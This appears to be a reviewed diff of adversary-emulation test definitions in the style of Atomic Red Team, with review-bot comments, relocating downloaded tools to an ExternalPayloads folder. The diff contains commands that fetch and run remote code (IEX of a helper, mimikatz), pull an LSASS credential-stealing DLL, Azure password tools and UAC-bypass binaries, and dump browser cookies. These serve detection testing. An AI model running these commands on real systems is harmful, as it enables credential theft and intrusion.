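Review bot: The `trufflesnout_path` default in the last hunk now points at `PathToAtomicsFolder\..\ExternalPayloads\TruffleSnout.exe`, but this chunk shows no corresponding change to the dependency that places the binary there; if that dependency still downloads or builds into `T1482\src`, the prereq check will never succeed with the new default. Please confirm the TruffleSnout get_prereq_command writes to the same path (its definition is outside this hunk). In the PowerView hunk, `if (Test-Path PathToAtomicsFolder\..\ExternalPayloads\PowerView.ps1)` is unquoted while the `Import-Module` line quotes the same path; quoting it avoids a parse error when the atomics folder path contains spaces.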
@@ -12,11 +12,11 @@ atomic_tests: sdelete_exe: description: Path of sdelete executable type: path - default: $env:TEMP\Sdelete\sdelete.exe + default: PathToAtomicsFolder\..\ExternalPayloads\Sdelete\sdelete.exe file_to_delete: description: Path of file to delete type: path - default: $env:TEMP\T1485.txt + default: PathToAtomicsFolder\..\ExternalPayloads\T1485.txt dependency_executor_name: powershell dependencies: - description: | @@ -24,9 +24,10 @@ atomic_tests: prereq_command: | if (Test-Path #{sdelete_exe}) {exit 0} else {exit 1} get_prereq_command: | - Invoke-WebRequest "https://download.sysinternals.com/files/SDelete.zip" -OutFile "$env:TEMP\SDelete.zip" - Expand-Archive $env:TEMP\SDelete.zip $env:TEMP\Sdelete -Force - Remove-Item $env:TEMP\SDelete.zip -Force + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://download.sysinternals.com/files/SDelete.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\SDelete.zip" + Expand-Archive PathToAtomicsFolder\..\ExternalPayloads\SDelete.zip PathToAtomicsFolder\..\ExternalPayloads\Sdelete -Force + Remove-Item PathToAtomicsFolder\..\ExternalPayloads\SDelete.zip -Force executor: command: | if (-not (Test-Path #{file_to_delete})) { New-Item #{file_to_delete} -Force } diff --git a/atomics/T1486/T1486.yaml b/atomics/T1486/T1486.yaml index 63e518ef..c91fafe7 100644 --- a/atomics/T1486/T1486.yaml +++ b/atomics/T1486/T1486.yaml 
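Review bot: With `file_to_delete` now defaulting to `PathToAtomicsFolder\..\ExternalPayloads\T1485.txt`, the unquoted `#{file_to_delete}` in `if (-not (Test-Path #{file_to_delete})) { New-Item #{file_to_delete} -Force }` is passed as two arguments whenever the resolved atomics path contains a space, whereas the same hunk quotes that kind of path in the `Invoke-WebRequest` line above. Quote both uses: `if (-not (Test-Path "#{file_to_delete}")) { New-Item "#{file_to_delete}" -Force }`. The executor body continues outside the hunk, so the sdelete invocation itself could not be checked here.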
@@ -265,8 +265,9 @@ atomic_tests: prereq_command: | if (test-path '#{GPG_Exe_Location}'){exit 0} else {exit 1} get_prereq_command: | - invoke-webrequest "https://files.gpg4win.org/gpg4win-4.1.0.exe" -outfile "$env:temp\gpginstall.exe" - cmd /c "$env:temp\gpginstall.exe" /S + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + invoke-webrequest "https://files.gpg4win.org/gpg4win-4.1.0.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\gpginstall.exe" + cmd /c "PathToAtomicsFolder\..\ExternalPayloads\gpginstall.exe" /S executor: name: powershell elevation_required: false diff --git a/atomics/T1526/T1526.yaml b/atomics/T1526/T1526.yaml index a206fbd6..33485f59 100644 --- a/atomics/T1526/T1526.yaml +++ b/atomics/T1526/T1526.yaml @@ -29,11 +29,12 @@ atomic_tests: dependency_executor_name: powershell dependencies: - description: | - The Get-AzDomainInfo script must exist in $env:temp. + The Get-AzDomainInfo script must exist in PathToAtomicsFolder\..\ExternalPayloads. prereq_command: | - if (test-path $env:temp\Get-AzDomainInfo.ps1){exit 0} else {exit 1} + if (test-path PathToAtomicsFolder\..\ExternalPayloads\Get-AzDomainInfo.ps1){exit 0} else {exit 1} get_prereq_command: | - invoke-webrequest "https://raw.githubusercontent.com/NetSPI/MicroBurst/c771c665a2c71f9c5ba474869cd1c211ebee68fd/Az/Get-AzDomainInfo.ps1" -outfile "$env:temp\Get-AzDomainInfo.ps1" + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + invoke-webrequest "https://raw.githubusercontent.com/NetSPI/MicroBurst/c771c665a2c71f9c5ba474869cd1c211ebee68fd/Az/Get-AzDomainInfo.ps1" -outfile "PathToAtomicsFolder\..\ExternalPayloads\Get-AzDomainInfo.ps1" - description: | The Az module must be installed. prereq_command: | 
@@ -42,7 +43,7 @@ atomic_tests: Install-Module -Name Az -Force executor: command: | - import-module "$env:temp\Get-AzDomainInfo.ps1" + import-module "PathToAtomicsFolder\..\ExternalPayloads\Get-AzDomainInfo.ps1" $Password = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Password Connect-AzAccount -Credential $Credential | out-null diff --git a/atomics/T1528/T1528.yaml b/atomics/T1528/T1528.yaml index 03d8e771..aa66f138 100644 --- a/atomics/T1528/T1528.yaml +++ b/atomics/T1528/T1528.yaml @@ -28,11 +28,12 @@ atomic_tests: dependency_executor_name: powershell dependencies: - description: | - The Get-AzurePasswords script must exist in $env:temp. + The Get-AzurePasswords script must exist in PathToAtomicsFolder\..\ExternalPayloads. prereq_command: | - if (test-path $env:temp\Get-AzurePasswords.ps1){exit 0} else {exit 1} + if (test-path PathToAtomicsFolder\..\ExternalPayloads\Get-AzurePasswords.ps1){exit 0} else {exit 1} get_prereq_command: | - invoke-webrequest "https://raw.githubusercontent.com/NetSPI/MicroBurst/c771c665a2c71f9c5ba474869cd1c211ebee68fd/AzureRM/Get-AzurePasswords.ps1" -outfile "$env:temp\Get-AzurePasswords.ps1" + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + invoke-webrequest "https://raw.githubusercontent.com/NetSPI/MicroBurst/c771c665a2c71f9c5ba474869cd1c211ebee68fd/AzureRM/Get-AzurePasswords.ps1" -outfile "PathToAtomicsFolder\..\ExternalPayloads\Get-AzurePasswords.ps1" - description: | The Azure RM module must be installed. prereq_command: | 
@@ -47,7 +48,7 @@ atomic_tests: Install-Module -Name Azure -Force -allowclobber executor: command: | - import-module "$env:temp\Get-AzurePasswords.ps1" + import-module "PathToAtomicsFolder\..\ExternalPayloads\Get-AzurePasswords.ps1" $Password = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Password Connect-AzureRmAccount -Credential $Credential diff --git a/atomics/T1530/T1530.yaml b/atomics/T1530/T1530.yaml index 9c3e1c84..a35e8535 100644 --- a/atomics/T1530/T1530.yaml +++ b/atomics/T1530/T1530.yaml 
@@ -20,24 +20,25 @@ atomic_tests: wordlist: description: File path to keywords for search permutations type: string - default: $env:temp\permutations.txt + default: PathToAtomicsFolder\..\ExternalPayloads\permutations.txt dependency_executor_name: powershell dependencies: - description: | - The Invoke-EnumerateAzureBlobs module must exist in $env:temp. + The Invoke-EnumerateAzureBlobs module must exist in PathToAtomicsFolder\..\ExternalPayloads. prereq_command: | - if (test-path $env:temp\Invoke-EnumerateAzureBlobs.ps1){exit 0} else {exit 1} + if (test-path PathToAtomicsFolder\..\ExternalPayloads\Invoke-EnumerateAzureBlobs.ps1){exit 0} else {exit 1} get_prereq_command: | - invoke-webrequest "https://raw.githubusercontent.com/NetSPI/MicroBurst/156c4e9f4253b482b2b68eda4651116b9f0f2e17/Misc/Invoke-EnumerateAzureBlobs.ps1" -outfile "$env:temp\Invoke-EnumerateAzureBlobs.ps1" + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + invoke-webrequest "https://raw.githubusercontent.com/NetSPI/MicroBurst/156c4e9f4253b482b2b68eda4651116b9f0f2e17/Misc/Invoke-EnumerateAzureBlobs.ps1" -outfile "PathToAtomicsFolder\..\ExternalPayloads\Invoke-EnumerateAzureBlobs.ps1" - description: | - The wordlist file for search permutations must exist in $env:temp. + The wordlist file for search permutations must exist in PathToAtomicsFolder\..\ExternalPayloads. prereq_command: | if (test-path #{wordlist}){exit 0} else {exit 1} get_prereq_command: | invoke-webrequest "https://raw.githubusercontent.com/NetSPI/MicroBurst/156c4e9f4253b482b2b68eda4651116b9f0f2e17/Misc/permutations.txt" -outfile "#{wordlist}" executor: command: | - import-module "$env:temp\Invoke-EnumerateAzureBlobs.ps1" + import-module "PathToAtomicsFolder\..\ExternalPayloads\Invoke-EnumerateAzureBlobs.ps1" Invoke-EnumerateAzureBlobs -base #{base} -permutations #{wordlist} -outputfile "#{output_file}" cleanup_command: | remove-item #{output_file} -erroraction silentlycontinue 
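Review bot: The wordlist dependency's `get_prereq_command` still writes `-outfile "#{wordlist}"` without the `New-Item -Type Directory` guard that this hunk adds to the sibling Invoke-EnumerateAzureBlobs dependency, so it only works because the previous dependency happens to run first and create the folder; anyone who overrides `wordlist` to another directory, or resolves dependencies individually, gets a download failure. Add `New-Item -Type Directory (Split-Path "#{wordlist}") -ErrorAction Ignore -Force | Out-Null` before the `invoke-webrequest` so the dependency stands on its own. The `-permutations #{wordlist}` argument in the executor is unquoted as well.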
diff --git a/atomics/T1539/T1539.yaml b/atomics/T1539/T1539.yaml index 9215dbe7..fc9d2fd2 100644 --- a/atomics/T1539/T1539.yaml +++ b/atomics/T1539/T1539.yaml @@ -13,11 +13,11 @@ atomic_tests: sqlite3_path: description: Path to sqlite3 type: path - default: $env:temp\sqlite-tools-win32-x86-3380200\sqlite3.exe + default: PathToAtomicsFolder\..\ExternalPayloads\sqlite-tools-win32-x86-3380200\sqlite3.exe output_file: description: Filepath to output cookies type: path - default: $env:temp\T1539FirefoxCookies.txt + default: PathToAtomicsFolder\..\ExternalPayloads\T1539FirefoxCookies.txt dependency_executor_name: powershell dependencies: - description: | @@ -25,8 +25,9 @@ atomic_tests: prereq_command: | if (Test-Path #{sqlite3_path}) {exit 0} else {exit 1} get_prereq_command: | - Invoke-WebRequest "https://www.sqlite.org/2022/sqlite-tools-win32-x86-3380200.zip" -OutFile "$env:temp\sqlite.zip" - Expand-Archive -path "$env:temp\sqlite.zip" -destinationpath "$env:temp\" -force + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://www.sqlite.org/2022/sqlite-tools-win32-x86-3380200.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\sqlite.zip" + Expand-Archive -path "PathToAtomicsFolder\..\ExternalPayloads\sqlite.zip" -destinationpath "PathToAtomicsFolder\..\ExternalPayloads\" -force executor: command: | stop-process -name "firefox" -force -erroraction silentlycontinue @@ -53,11 +54,11 @@ atomic_tests: sqlite3_path: description: Path to sqlite3 type: path - default: $env:temp\sqlite-tools-win32-x86-3380200\sqlite3.exe + default: PathToAtomicsFolder\..\ExternalPayloads\sqlite-tools-win32-x86-3380200\sqlite3.exe output_file: description: Filepath to output cookies type: path - default: $env:temp\T1539ChromeCookies.txt + default: PathToAtomicsFolder\..\ExternalPayloads\T1539ChromeCookies.txt dependency_executor_name: powershell dependencies: - description: | 
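Review bot: The sqlite get_prereq_command in the second hunk leaves `PathToAtomicsFolder\..\ExternalPayloads\sqlite.zip` behind after `Expand-Archive`, whereas the equivalent SDelete hunk in T1485 removes its archive; now that the folder is persistent rather than `$env:temp`, add `Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\sqlite.zip" -Force` after the extraction. The `output_file` default for the cookie dump also moves into the same persistent folder; a cleanup_command for it is not visible in this chunk, so confirm one exists, since that file holds live session cookies.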
@@ -65,8 +66,9 @@ atomic_tests: prereq_command: | if (Test-Path #{sqlite3_path}) {exit 0} else {exit 1} get_prereq_command: | - Invoke-WebRequest "https://www.sqlite.org/2022/sqlite-tools-win32-x86-3380200.zip" -OutFile "$env:temp\sqlite.zip" - Expand-Archive -path "$env:temp\sqlite.zip" -destinationpath "$env:temp\" -force + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://www.sqlite.org/2022/sqlite-tools-win32-x86-3380200.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\sqlite.zip" + Expand-Archive -path "PathToAtomicsFolder\..\ExternalPayloads\sqlite.zip" -destinationpath "PathToAtomicsFolder\..\ExternalPayloads\" -force executor: command: | stop-process -name "chrome" -force -erroraction silentlycontinue diff --git a/atomics/T1546.015/T1546.015.yaml b/atomics/T1546.015/T1546.015.yaml index 158c8e48..9605fb57 100644 --- a/atomics/T1546.015/T1546.015.yaml +++ b/atomics/T1546.015/T1546.015.yaml @@ -17,7 +17,7 @@ atomic_tests: dllpath: description: Path to the DLL. type: string - default: $env:TEMP\AtomicTest.dll + default: PathToAtomicsFolder\..\ExternalPayloads\AtomicTest.dll clsid: description: Class ID to hijack. type: string @@ -30,7 +30,9 @@ atomic_tests: dependencies: - description: DLL For testing prereq_command: 'if (Test-Path #{dllpath}) {exit 0} else {exit 1}' - get_prereq_command: Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/bin/AtomicTest.dll" -OutFile "#{dllpath}" + get_prereq_command: | + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/bin/AtomicTest.dll" -OutFile "#{dllpath}" executor: command: |- New-Item -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}' -Value '#{clsid_description}' 
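Review bot: In the `@@ -30,7 +30,9 @@` hunk the new `New-Item` creates `PathToAtomicsFolder\..\ExternalPayloads\` but the download goes to `-OutFile "#{dllpath}"`, which is an overridable input; if a caller supplies a `dllpath` in another directory the guard does nothing and the download fails. Derive the directory from the argument instead: `New-Item -Type Directory (Split-Path "#{dllpath}") -ErrorAction Ignore -Force | Out-Null`, the pattern T1207's PsExec dependency in this commit already uses. The same applies to the second DLL hunk of this file and to the RemotePC, NetSupport and UltraViewer hunks in T1219.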
@@ -72,7 +74,7 @@ atomic_tests: dll_path: description: Path to the DLL. type: string - default: $env:temp\T1546.015_calc.dll + default: PathToAtomicsFolder\..\ExternalPayloads\T1546.015_calc.dll clsid: description: Class ID to hijack. type: string @@ -85,7 +87,9 @@ atomic_tests: dependencies: - description: DLL For testing prereq_command: 'if (Test-Path #{dll_path}) {exit 0} else {exit 1}' - get_prereq_command: Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/bin/T1546.015_calc.dll" -OutFile "#{dll_path}" + get_prereq_command: | + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/bin/T1546.015_calc.dll" -OutFile "#{dll_path}" executor: command: |- New-Item -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}' -Value '#{clsid_description}' diff --git a/atomics/T1547.008/T1547.008.yaml b/atomics/T1547.008/T1547.008.yaml index 624a5d02..b48cfd47 100644 --- a/atomics/T1547.008/T1547.008.yaml +++ b/atomics/T1547.008/T1547.008.yaml @@ -15,7 +15,7 @@ atomic_tests: dll_path: description: Module to be loaded into LSASS type: path - default: '$env:TEMP\lsass_lib.dll' + default: 'PathToAtomicsFolder\..\ExternalPayloads\lsass_lib.dll' dependency_executor_name: powershell dependencies: - description: | @@ -24,6 +24,7 @@ atomic_tests: if (Test-Path #{dll_path}) {exit 0} else {exit 1} get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null Invoke-WebRequest "https://github.com/oxfemale/LogonCredentialsSteal/raw/53e74251f397ddeab2bd1348c3ff26d702cfd836/lsass_lib/x64/Release/lsass_lib.dll" -UseBasicParsing -OutFile "#{dll_path}" executor: command: | 
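Review bot: In the T1547.008 hunk `if (Test-Path #{dll_path})` is unquoted, so a resolved atomics path with a space makes the prereq fail before the new `New-Item`/download lines are ever reached; the `-OutFile "#{dll_path}"` two lines below is quoted, so only the check is inconsistent. Change it to `if (Test-Path "#{dll_path}") {exit 0} else {exit 1}`. Given this DLL is described as being loaded into LSASS, pinning the download to a commit hash is good; a `Get-FileHash` comparison before the executor loads it would close the remaining gap between download and use now that the file persists in ExternalPayloads.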
diff --git a/atomics/T1548.002/T1548.002.yaml b/atomics/T1548.002/T1548.002.yaml index 80ecc3c5..59a64880 100644 --- a/atomics/T1548.002/T1548.002.yaml +++ b/atomics/T1548.002/T1548.002.yaml @@ -214,7 +214,7 @@ atomic_tests: uacme_exe: description: Path to uacme executable type: path - default: '%temp%\uacme\23 Akagi64.exe' + default: 'PathToAtomicsFolder\..\ExternalPayloads\uacme\23 Akagi64.exe' dependency_executor_name: powershell dependencies: - description: | @@ -223,9 +223,11 @@ atomic_tests: $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} get_prereq_command: | - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "$env:TEMP\uacme.zip" - Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force - Remove-Item $env:TEMP\uacme.zip -Force + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip" + Expand-Archive PathToAtomicsFolder\..\ExternalPayloads\uacme.zip PathToAtomicsFolder\..\ExternalPayloads\uacme -Force + Remove-Item PathToAtomicsFolder\..\ExternalPayloads\uacme.zip -Force executor: command: | "#{uacme_exe}" @@ -260,7 +262,7 @@ atomic_tests: uacme_exe: description: Path to uacme executable type: path - default: '%temp%\uacme\31 Akagi64.exe' + default: 'PathToAtomicsFolder\..\ExternalPayloads\uacme\31 Akagi64.exe' dependency_executor_name: powershell dependencies: - description: | 
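Review bot: The `@@ -223,9 +223,11 @@` hunk adds the `New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" ...` line twice; drop the duplicate. With the defaults no longer using `%temp%`, the context lines `$tempPath = cmd /c echo #{uacme_exe}` / `if (Test-Path "$tempPath")` have lost their purpose (they existed to expand the cmd-style variable) and now spawn a cmd.exe just to echo a literal path; `if (Test-Path "#{uacme_exe}") {exit 0} else {exit 1}` does the same job without the shell round-trip. The identical uacme hunks that follow for tests 31, 33, 34, 39, 56, 59 and 61 keep the same leftover.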
@@ -269,9 +271,10 @@ atomic_tests: $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} get_prereq_command: | - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "$env:TEMP\uacme.zip" - Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force - Remove-Item $env:TEMP\uacme.zip -Force + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip" + Expand-Archive PathToAtomicsFolder\..\ExternalPayloads\uacme.zip PathToAtomicsFolder\..\ExternalPayloads\uacme -Force + Remove-Item PathToAtomicsFolder\..\ExternalPayloads\uacme.zip -Force executor: command: | "#{uacme_exe}" @@ -306,7 +309,7 @@ atomic_tests: uacme_exe: description: Path to uacme executable type: path - default: '%temp%\uacme\33 Akagi64.exe' + default: 'PathToAtomicsFolder\..\ExternalPayloads\uacme\33 Akagi64.exe' dependency_executor_name: powershell dependencies: - description: | 
@@ -315,9 +318,10 @@ atomic_tests: $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} get_prereq_command: | - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "$env:TEMP\uacme.zip" - Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force - Remove-Item $env:TEMP\uacme.zip -Force + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip" + Expand-Archive PathToAtomicsFolder\..\ExternalPayloads\uacme.zip PathToAtomicsFolder\..\ExternalPayloads\uacme -Force + Remove-Item PathToAtomicsFolder\..\ExternalPayloads\uacme.zip -Force executor: command: | "#{uacme_exe}" @@ -352,7 +356,7 @@ atomic_tests: uacme_exe: description: Path to uacme executable type: path - default: '%temp%\uacme\34 Akagi64.exe' + default: 'PathToAtomicsFolder\..\ExternalPayloads\uacme\34 Akagi64.exe' dependency_executor_name: powershell dependencies: - description: | 
@@ -361,9 +365,10 @@ atomic_tests: $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} get_prereq_command: | - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "$env:TEMP\uacme.zip" - Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force - Remove-Item $env:TEMP\uacme.zip -Force + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip" + Expand-Archive PathToAtomicsFolder\..\ExternalPayloads\uacme.zip PathToAtomicsFolder\..\ExternalPayloads\uacme -Force + Remove-Item PathToAtomicsFolder\..\ExternalPayloads\uacme.zip -Force executor: command: | "#{uacme_exe}" @@ -398,7 +403,7 @@ atomic_tests: uacme_exe: description: Path to uacme executable type: path - default: '%temp%\uacme\39 Akagi64.exe' + default: 'PathToAtomicsFolder\..\ExternalPayloads\uacme\39 Akagi64.exe' dependency_executor_name: powershell dependencies: - description: | 
@@ -407,9 +412,10 @@ atomic_tests: $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} get_prereq_command: | - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "$env:TEMP\uacme.zip" - Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force - Remove-Item $env:TEMP\uacme.zip -Force + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip" + Expand-Archive PathToAtomicsFolder\..\ExternalPayloads\uacme.zip PathToAtomicsFolder\..\ExternalPayloads\uacme -Force + Remove-Item PathToAtomicsFolder\..\ExternalPayloads\uacme.zip -Force executor: command: | "#{uacme_exe}" @@ -444,7 +450,7 @@ atomic_tests: uacme_exe: description: Path to uacme executable type: path - default: '%temp%\uacme\56 Akagi64.exe' + default: 'PathToAtomicsFolder\..\ExternalPayloads\uacme\56 Akagi64.exe' dependency_executor_name: powershell dependencies: - description: | 
@@ -453,9 +459,10 @@ atomic_tests: $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} get_prereq_command: | - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "$env:TEMP\uacme.zip" - Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force - Remove-Item $env:TEMP\uacme.zip -Force + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip" + Expand-Archive PathToAtomicsFolder\..\ExternalPayloads\uacme.zip PathToAtomicsFolder\..\ExternalPayloads\uacme -Force + Remove-Item PathToAtomicsFolder\..\ExternalPayloads\uacme.zip -Force executor: command: | "#{uacme_exe}" @@ -490,7 +497,7 @@ atomic_tests: uacme_exe: description: Path to uacme executable type: path - default: '%temp%\uacme\59 Akagi64.exe' + default: 'PathToAtomicsFolder\..\ExternalPayloads\uacme\59 Akagi64.exe' dependency_executor_name: powershell dependencies: - description: | 
@@ -499,9 +506,10 @@ atomic_tests: $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} get_prereq_command: | - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "$env:TEMP\uacme.zip" - Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force - Remove-Item $env:TEMP\uacme.zip -Force + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip" + Expand-Archive PathToAtomicsFolder\..\ExternalPayloads\uacme.zip PathToAtomicsFolder\..\ExternalPayloads\uacme -Force + Remove-Item PathToAtomicsFolder\..\ExternalPayloads\uacme.zip -Force executor: command: | "#{uacme_exe}" @@ -536,7 +544,7 @@ atomic_tests: uacme_exe: description: Path to uacme executable type: path - default: '%temp%\uacme\61 Akagi64.exe' + default: 'PathToAtomicsFolder\..\ExternalPayloads\uacme\61 Akagi64.exe' dependency_executor_name: powershell dependencies: - description: | 
@@ -545,9 +553,10 @@ atomic_tests: $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} get_prereq_command: | - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "$env:TEMP\uacme.zip" - Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force - Remove-Item $env:TEMP\uacme.zip -Force + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip" + Expand-Archive PathToAtomicsFolder\..\ExternalPayloads\uacme.zip PathToAtomicsFolder\..\ExternalPayloads\uacme -Force + Remove-Item PathToAtomicsFolder\..\ExternalPayloads\uacme.zip -Force executor: command: | "#{uacme_exe}" diff --git a/atomics/T1550.003/T1550.003.yaml b/atomics/T1550.003/T1550.003.yaml index c8efd933..e61c3f11 100644 --- a/atomics/T1550.003/T1550.003.yaml +++ b/atomics/T1550.003/T1550.003.yaml @@ -15,7 +15,7 @@ atomic_tests: mimikatz_exe: description: Path of the Mimikatz binary type: path - default: PathToAtomicsFolder\T1550.003\bin\x64\mimikatz.exe + default: PathToAtomicsFolder\..\ExternalPayloads\bin\x64\mimikatz.exe dependency_executor_name: powershell dependencies: - description: | 
@@ -24,6 +24,7 @@ atomic_tests: if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1} get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing) $releases = "https://api.github.com/repos/gentilkiwi/mimikatz/releases" $zipUrl = (Invoke-WebRequest $releases | ConvertFrom-Json)[0].assets.browser_download_url | where-object { $_.endswith(".zip") } 
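Review bot: In the mimikatz dependency hunk, `Invoke-WebRequest $releases | ConvertFrom-Json` omits the `-UseBasicParsing` that the preceding `iwr` line uses; on Windows PowerShell 5.1 hosts where Internet Explorer has never been initialised that call can error out, so add the switch for consistency. The same line takes `[0]` of the GitHub releases API, i.e. whatever the newest mimikatz release is, and `IEX` runs `Invoke-FetchFromZip.ps1` from the mutable `master` branch, so neither the helper nor the binary is pinned the way the MicroBurst and PowerView downloads in this commit are; pinning both (a release tag for the zip, a commit hash in the raw URL) makes the prerequisite reproducible. The `mimikatz_exe` default now expects a `bin\x64` subfolder under ExternalPayloads, which depends on how Invoke-FetchFromZip lays out the archive — that part is outside this hunk.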
